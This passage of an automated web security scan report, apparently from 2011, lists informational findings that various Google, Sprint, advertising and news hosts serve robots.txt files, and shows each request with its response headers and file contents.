Host:   https://mail.google.com
Path:   /mail/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mail.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 01:22:51 GMT
Expires: Sun, 04 Sep 2011 01:22:51 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.53. https://maps-api-ssl.google.com/maps

Summary

Severity:   Information
Confidence:   Certain
Host:   https://maps-api-ssl.google.com
Path:   /maps

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: maps-api-ssl.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Mon, 23 Aug 2010 20:46:35 GMT
Date: Sun, 04 Sep 2011 01:22:52 GMT
Expires: Sun, 04 Sep 2011 01:22:52 GMT
Cache-Control: private, max-age=31536000
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.54. http://maps.google.com/maps

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: maps.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 01:22:51 GMT
Expires: Sun, 04 Sep 2011 01:22:51 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.55. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s88955233080778

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.sprint.com
Path:   /b/ss/sprintuniversalsiteprod/1/H.22.1/s88955233080778

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:10 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "309122-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www376
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.56. http://news.google.com/news/story

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /news/story

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: news.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 01:23:03 GMT
Expires: Sun, 04 Sep 2011 01:23:03 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.57. http://nextelonline.nextel.com/tl/set_tl.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nextelonline.nextel.com
Path:   /tl/set_tl.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nextelonline.nextel.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 04 Sep 2011 00:45:25 GMT
Content-length: 148
Content-type: text/plain
Last-modified: Sat, 14 Mar 2009 10:44:59 GMT
Accept-ranges: bytes
Connection: close

#
# robots.txt for
#
# Dynamic Apps
User-agent: *
Disallow: /NASApp/registration
Disallow: /wps/
User-agent: nol-Ultraseek
Disallow: /wps/


26.58. http://nmcharlotte.112.2o7.net/b/ss/nmcharlotte/1/H.20.3/s85129847696516

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nmcharlotte.112.2o7.net
Path:   /b/ss/nmcharlotte/1/H.20.3/s85129847696516

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nmcharlotte.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:26 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "131248-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www182
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.59. http://notredame-hospitality.cbscollegestore.com/store.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://notredame-hospitality.cbscollegestore.com
Path:   /store.cfm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: notredame-hospitality.cbscollegestore.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:30 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 14:52:25 GMT
ETag: "49fadb-7b-48a1844cd5c40"
Accept-Ranges: bytes
Content-Length: 123
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cfc
Disallow: /cfide
Disallow: /include
Disallow: /scripts
Disallow: /css
Disallow: /maint

26.60. http://ocp.ncaa.com/adFunctions.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ocp.ncaa.com
Path:   /adFunctions.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ocp.ncaa.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:08 GMT
Server: Apache/2.2
Last-Modified: Mon, 08 Aug 2011 20:38:19 GMT
Accept-Ranges: bytes
Content-Length: 3614
Keep-Alive: timeout=15, max=716
Connection: Keep-Alive
Content-Type: text/plain

# $Source: /cvs/main/ops/config/global/w/robots.txt,v $
# $Revision: 1.26 $
#
User-agent: *
Disallow: /Ads/
Disallow: /redir/
# Disallow: /i/ is removed per 190723
Disallow: /av/
Disallow: /css/
Disal
...[SNIP]...

26.61. http://odb.outbrain.com/utils/get

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: odb.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"30-1311068652000"
Last-Modified: Tue, 19 Jul 2011 09:44:12 GMT
Content-Type: text/plain
Content-Length: 30
Date: Sun, 04 Sep 2011 00:44:38 GMT
Connection: close

User-agent: *
Disallow: /


26.62. http://pagead2.googlesyndication.com/pagead/imgad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 01:05:20 GMT
Expires: Mon, 05 Sep 2011 01:05:20 GMT
Cache-Control: public, max-age=86400
Server: cafe
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

26.63. http://paid.outbrain.com/network/redir

Summary

Severity:   Information
Confidence:   Certain
Host:   http://paid.outbrain.com
Path:   /network/redir

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: paid.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"30-1311068652000"
Last-Modified: Tue, 19 Jul 2011 09:44:12 GMT
Content-Type: text/plain
Content-Length: 30
Date: Sun, 04 Sep 2011 01:23:11 GMT
Connection: close

User-agent: *
Disallow: /


26.64. http://pbid.pro-market.net/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pbid.pro-market.net
Path:   /crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pbid.pro-market.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC"
ANServer: tapp2.ny
ETag: W/"27-1312809562000"
Last-Modified: Mon, 08 Aug 2011 13:19:22 GMT
Content-Type: text/plain
Content-Length: 27
Date: Sun, 04 Sep 2011 01:10:59 GMT
Connection: close

User-agent: *
Disallow: /


26.65. http://picasaweb.google.com/lh/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /lh/view

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: picasaweb.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 01:23:13 GMT
Expires: Sun, 04 Sep 2011 01:23:13 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Allow: /lh/albumList
Allow: /lh/album
Allow: /lh/favorites
Allow: /lh/idredir
Allow: /lh/photo
Allow: /lh/sredir
Disallow: /lh/

26.66. http://pixel.invitemedia.com/admeld_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 04 Sep 2011 01:05:06 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

26.67. http://pixel.quantserve.com/seg/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /seg/r

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 00:45:10 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sun, 04 Sep 2011 00:45:10 GMT
Server: QS

User-agent: *
Disallow: /

26.68. http://premium.mookie1.com/2/nbc.com/ac@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://premium.mookie1.com
Path:   /2/nbc.com/ac@Bottom3

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: premium.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jun 2010 15:38:09 GMT
ETag: "d4820d-1a-48821fe531a40"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /

26.69. http://pubads.g.doubleclick.net/gampad/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 01:23:24 GMT
Expires: Mon, 05 Sep 2011 01:23:24 GMT
Cache-Control: public, max-age=86400
Server: cafe
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

26.70. http://r.turn.com/server/pixel.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sun, 04 Sep 2011 01:06:00 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

26.71. http://rd.rlcdn.com/rd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rd.rlcdn.com
Path:   /rd

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rd.rlcdn.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 26
Last-Modified: Fri, 02 Sep 2011 17:41:18 GMT

User-Agent: *
Disallow: /

26.72. http://rt.legolas-media.com/lgrt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rt.legolas-media.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:45 GMT
Server: Apache
Last-Modified: Fri, 08 Jul 2011 17:46:27 GMT
ETag: "38100-1b-4a79269af42c0"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /


26.73. http://rtq.careerbuilder.com/RTQ/jobstream.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rtq.careerbuilder.com
Path:   /RTQ/jobstream.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rtq.careerbuilder.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Last-Modified: Tue, 16 Aug 2011 11:16:02 GMT
Accept-Ranges: bytes
ETag: "94b831e255ccc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: REBEL32
Date: Sun, 04 Sep 2011 00:57:57 GMT
Connection: close
Content-Length: 10018

User-agent: Mediapartners-Google*
Disallow:

User-agent: Google*
Disallow: /Custom/
Disallow: /custom/
Disallow: /Partner/
Disallow: /partner/
Disallow: /PSA/
Disallow: /psa/
Disallow: /RTQ
...[SNIP]...

26.74. http://s0.2mdn.net/1181183/espn_cfb_728x90_sn_main.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /1181183/espn_cfb_728x90_sn_main.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 04 Sep 2011 00:44:46 GMT
Expires: Mon, 05 Sep 2011 00:44:46 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /

26.75. http://sacramentoconnect.sacbee.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sacramentoconnect.sacbee.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sacramentoconnect.sacbee.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:23:34 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: W3 Total Cache/0.9.2.3
Set-Cookie: wpmp_switcher=desktop; expires=Mon, 03-Sep-2012 01:23:35 GMT; path=/
X-Pingback: http://sacramentoconnect.sacbee.com/wordpress/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.4
Cache-Control: max-age=3600
Expires: Sun, 04 Sep 2011 02:23:34 GMT
Vary: User-Agent
Content-Length: 85
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://sacramentoconnect.sacbee.com/sitemap.xml.gz

26.76. http://safebrowsing.clients.google.com/safebrowsing/gethash

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/gethash

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 01:23:41 GMT
Expires: Sun, 04 Sep 2011 01:23:41 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.77. http://scholar.google.com/scholar

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scholar.google.com
Path:   /scholar

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: scholar.google.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:23:43 GMT
Expires: Mon, 05 Sep 2011 01:23:43 GMT
Cache-Control: public, max-age=86400
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 19:25:15 GMT
X-Content-Type-Options: nosniff
Server: scholar
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.78. http://search.barnesandnoble.com/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.barnesandnoble.com
Path:   /The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search.barnesandnoble.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
P3P: CP="CAO DSP COR ADM DEV TAI PSA IVDo CONo HIS TELo DEL SAMo UNRo LEG PRE"
X-Powered-By: ASP.NET
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Fri, 06 May 2011 20:47:43 GMT
ETag: "1264b4d82eccc1:1010"
Content-Length: 194
Cache-Control: max-age=64766
Expires: Sun, 04 Sep 2011 19:23:09 GMT
Date: Sun, 04 Sep 2011 01:23:43 GMT
Connection: close

# search

User-agent: *
Disallow: /booksearch/pfp.asp
Disallow: /booksearch/store.asp
Disallow: /booksearch/imageviewer.asp
Disallow: /reviews/reviews.asp
Disallow: /used/product.asp


26.79. http://search.charlotteobserver.com/search-bin/search.pl.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.charlotteobserver.com
Path:   /search-bin/search.pl.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search.charlotteobserver.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:23:45 GMT
Server: Apache/1.3.41
Vary: Accept-Encoding
Last-Modified: Mon, 12 Jul 2010 21:15:00 GMT
ETag: "192f210-89-4c3b85d4"
Accept-Ranges: bytes
Content-Length: 137
Content-Type: text/plain
Connection: close

User-Agent: *
Allow: /

Sitemap: http://www.charlotteobserver.com/sitemap.xml
Sitemap: http://www.charlotteobserver.com/news_sitemap.xml

26.80. http://search.spotxchange.com/partner

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.spotxchange.com
Path:   /partner

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search.spotxchange.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:46 GMT
Server: Apache
Last-Modified: Mon, 28 Feb 2011 23:42:39 GMT
ETag: "5b017b-406a-4d6c32ef"
Accept-Ranges: bytes
Content-Length: 16490
Connection: close
Content-Type: text/plain

#
# IAB_ABCe_International_Spiders_and_Robots_200612
#
# December 20, 2006
#
# **********COMMENTS SECTION***************************************************
#
# This list has been reviewed by the IAB
...[SNIP]...

26.81. http://search2.sacbee.com/search-bin/search.pl.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search2.sacbee.com
Path:   /search-bin/search.pl.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search2.sacbee.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:23:50 GMT
Server: Apache/1.3.41
Vary: Accept-Encoding
Last-Modified: Mon, 12 Jul 2010 21:19:37 GMT
ETag: "13e0dcb-3bb-4c3b86e9"
Accept-Ranges: bytes
Content-Length: 955
Content-Type: text/plain
Connection: close

# update log
# 2009-08-26 - kparker @ MI 727-7946968 added, then removed 1198 and newhomes.
# 209-01-29 - pbuckley @ MI added sitemap2 and sitemap3
# 2008-07-23 - pbuckley @ MI
# 2007/03/05 - rwm

Us
...[SNIP]...

26.82. http://shlinks.industrybrains.com/sh

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shlinks.industrybrains.com
Path:   /sh

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: shlinks.industrybrains.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:23:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/plain
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 04 Sep 2011 01:23:53 GMT
Content-Length: 26

User-agent: *
Disallow: /

26.83. http://shop2.sprint.com/assets/olsvideo/mediaPlayer.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop2.sprint.com
Path:   /assets/olsvideo/mediaPlayer.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: shop2.sprint.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 04 Sep 2011 01:23:55 GMT
Content-type: text/plain
Last-modified: Sat, 14 Mar 2009 10:44:56 GMT
Content-length: 148
Etag: "94-49bb8aa8"
Accept-ranges: bytes
Connection: close

#
# robots.txt for
#
# Dynamic Apps
User-agent: *
Disallow: /NASApp/registration
Disallow: /wps/
User-agent: nol-Ultraseek
Disallow: /wps/


26.84. http://shopping.sacbee.com/ROP/Subcat.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shopping.sacbee.com
Path:   /ROP/Subcat.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: shopping.sacbee.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 25 Mar 2010 20:28:57 GMT
Accept-Ranges: bytes
ETag: "5d30cacb59ccca1:0"
Server: Microsoft-IIS/7.5
X-Server-Name: HW3
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:23:54 GMT
Connection: close
Content-Length: 2166

User-agent: *
Disallow: /shared/AddShoppingList.aspx
Disallow: /shared/ViewShoppingList.aspx
Disallow: /shared/popup.aspx
Disallow: /shared/EmailAFreind.aspx
Disallow: /shared/FeedbackForm.aspx

...[SNIP]...

26.85. http://simg.zedo.com/speed-test/10k.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://simg.zedo.com
Path:   /speed-test/10k.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: simg.zedo.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sun, 04 Sep 2011 01:05:11 GMT
ETag: "37c4e0-4c-3f861aa21f400"
Last-Modified: Tue, 31 May 2005 07:08:00 GMT
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Server: ECS (sjo/5238)
X-Cache: HIT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

26.86. https://sites.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sites.google.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sites.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:24:02 GMT
Expires: Sun, 04 Sep 2011 01:24:02 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /feeds
Disallow: /*/_/

26.87. http://slashdot.org/bookmark.pl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://slashdot.org
Path:   /bookmark.pl

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: slashdot.org

Response

HTTP/1.1 200 OK
Server: Apache/1.3.42 (Unix) mod_perl/1.31
X-Powered-By: Slash 2.00500120110825.03
X-Fry: That's a chick show. I prefer programs of the genre: World's Blankiest Blank.
X-XRDS-Location: http://slashdot.org/slashdot.xrds
Last-Modified: Wed, 20 Apr 2011 17:51:03 GMT
ETag: "15f42f-503-4daf1d07"
Content-Type: text/plain
Content-Length: 1283
Date: Sun, 04 Sep 2011 01:24:07 GMT
X-Varnish: 807280433
Age: 0
Connection: close

# robots.txt for Slashdot.org
# $Id$
# "Any empty [Disallow] value, indicates that all URLs can be retrieved.
# At least one Disallow field needs to be present in a record."

User-agent: Mediapartners
...[SNIP]...

26.88. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sprint.tt.omtrdc.net
Path:   /m2/sprint/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sprint.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: text/plain
Date: Sun, 04 Sep 2011 00:45:31 GMT
Accept-Ranges: bytes
ETag: W/"25-1309299047000"
Connection: close
Last-Modified: Tue, 28 Jun 2011 22:10:47 GMT
Content-Length: 25

User-agent: *
Disallow: /

26.89. http://static.ak.fbcdn.net/connect/xd_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.30.147.196
X-Cnection: close
Date: Sun, 04 Sep 2011 01:12:40 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

26.90. http://store.cstv.com/marketplace/store.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.cstv.com
Path:   /marketplace/store.cfm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: store.cstv.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:43 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 14:52:25 GMT
ETag: "49fadb-7b-48a1844cd5c40"
Accept-Ranges: bytes
Content-Length: 123
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cfc
Disallow: /cfide
Disallow: /include
Disallow: /scripts
Disallow: /css
Disallow: /maint

26.91. http://sync.mathtag.com/sync/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f47 32583
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *

26.92. http://tag.admeld.com/ad/js/741/mcclatchy/728x90/sacramento_sacbee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/js/741/mcclatchy/728x90/sacramento_sacbee

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Last-Modified: Wed, 31 Aug 2011 21:42:54 GMT
ETag: "5de0036-1a-4abd402b9f380"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Sun, 04 Sep 2011 01:01:14 GMT
Connection: close

User-agent: *
Disallow: /

26.93. http://tcr.tynt.com/javascripts/Tracer.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tcr.tynt.com
Path:   /javascripts/Tracer.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tcr.tynt.com

Response

HTTP/1.0 200 OK
